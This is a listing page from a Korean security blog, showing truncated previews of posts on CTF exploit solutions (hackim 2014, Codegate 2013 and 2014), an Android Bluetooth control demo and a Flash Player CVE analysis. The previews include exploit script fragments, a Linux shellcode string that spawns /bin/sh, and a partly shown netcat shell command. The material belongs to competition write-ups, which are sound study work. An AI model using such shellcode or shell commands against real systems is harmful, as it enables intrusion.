'blackcon' 카테고리의 글 목록 (8 Page)

Notice

Recent Posts

Recent Comments

Link

« 2018/06 »
일	월	화	수	목	금	토
					1	2
3	4	5	6	7	8	9
10	11	12	13	14	15	16
17	18	19	20	21	22	23
24	25	26	27	28	29	30

Tags more

Archives

2018/04 (2)
2017/01 (1)
2016/12 (5)
2016/05 (1)
2016/04 (1)

Today: 7

Total: 154,599

관리 메뉴

목록blackcon (126)

Hello, Stranger

[exploit] hackim 2014 exploit 300

# 1. malloc(0x100)과 malloc(0)을 생성. # 2. malloc(0)의 size는 stage2에서 버퍼를 채움으로써 변경가능 # 3. strcpy(0x100, 0x110)으로 Heap Overflow 발생 # 4. [Heeeeeeeeaaaaaaaaaaapppp][Function1][Function2] 힙을 채움으로써 function1을 덮을수 있음 # 5. function1은 [pop ret]로 덮음 # 6. 그 후 stage ..

CTF & War game/CTF 풀이 2014.02.11 04:37

[exploit] CODEGATE Junior 2014 nuclear

import socket import struct import time p = lambda x: struct.pack("<I", x) host = "58.229.183.22" #host = "192.168.0.5" port = 1129 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((host, port)) print s.recv(1024) print s..

CTF & War game/CTF 풀이 2014.02.10 00:28

bluetooth를 이용한 안드로이드폰 제어

2014년 1월에 처음으로 열린 경남권 세미나에서 발표한 "Bluetooth Security"의 Demo코드를 공개하겠습니다. 블루투스를 공부하면서 스마트폰을 제어할 수 있는 코드를 작성해봤는데요. 구조는 아주 간단하니 다 보이실거에요^^ ※악용의 소지가 될 수 있으므로 사용법은 공개하지 않겠습니다. (질문 환영입니다~!! 물론 태클도 환영해요. 점프연습 많이 해둘게요 ㅋㅋ 다 피해버리겠어 +_+) Atcomman..

Security/Network 2014.02.07 01:58

[exploit] hackim 2014 exploit 200

import socket import struct ip = "192.168.0.14" port = 6776 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #payload = [strcpy] [pp ret] [freespace] [0xFF] [strcpy] [pp ret] [freespace+1] [0xE4] [freespace] [shellcode] # or [strcpy] [pp ..

CTF & War game/CTF 풀이 2014.02.07 01:19

[exploit]codegate 2013 vuln300

#!/usr/bin/python from socket import * shellcode = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" payload = "" payload += "-4..

CTF & War game/CTF 풀이 2014.02.07 01:15

[exploit]codegate 2013 vuln200

#!/usr/bin/env python import socket import struct host = '127.0.0.1' port = 7777 p = lambda x: struct.pack("<L", x) recv_plt = 0x8048780 freespace= 0x804b0a0 pppr = 0x08048d35 ppppr = 0x80493ac fd = 8 #shellcode : /bin/sh -c nc 192..

CTF & War game/CTF 풀이 2014.02.07 01:11

Adobe Flash Player 취약점(CVE-2012-0754) 분석

2012년에 등장한 Adobe Flash Player mp4 cprt 취약점을 분석했습니다. Heap Spraying 기법과 같이 작성했으니 도움됐으면 좋겠네요 :D

Security/취약점 분석 2014.01.24 07:21

Heap Sort (isnert & remove)

#include <stdio.h>#include <iostream>using namespace std;void out(int *a){ printf("%d\n", a[0]); for(int i = 0; i < 10;i++){ for(int j = 0; j < 10; j++){ if((2*j+1) == i) printf("%d, %d\n", a[i], i); /*왼쪽 출력*/ else if((2*j+2) == ..

Computer Languages/C | C++ 2013.11.26 00:03

2013 HUST Hacking Festival 풀이

올해 hust는 8단계까지 풀어서 아쉬웠네요.. 풀이는 1stage부터 2stage 8번까지 입니다. 난해한 문제가 많았던 대회....모두 수고하셨습니다!! :)

CTF & War game/CTF 풀이 2013.11.25 02:56

2013 Cscamp CTF writeup

Forensics 1.-----------------------------------------------------------------------------------------------Databases are very critical. Thats why there is an always backup of the database.Our database admin, John, had an attack and he lost all informati..

CTF & War game/CTF 풀이 2013.11.19 18:43

Prev 1 ··· 5 6 7 8 9 10 11 ··· 13 Next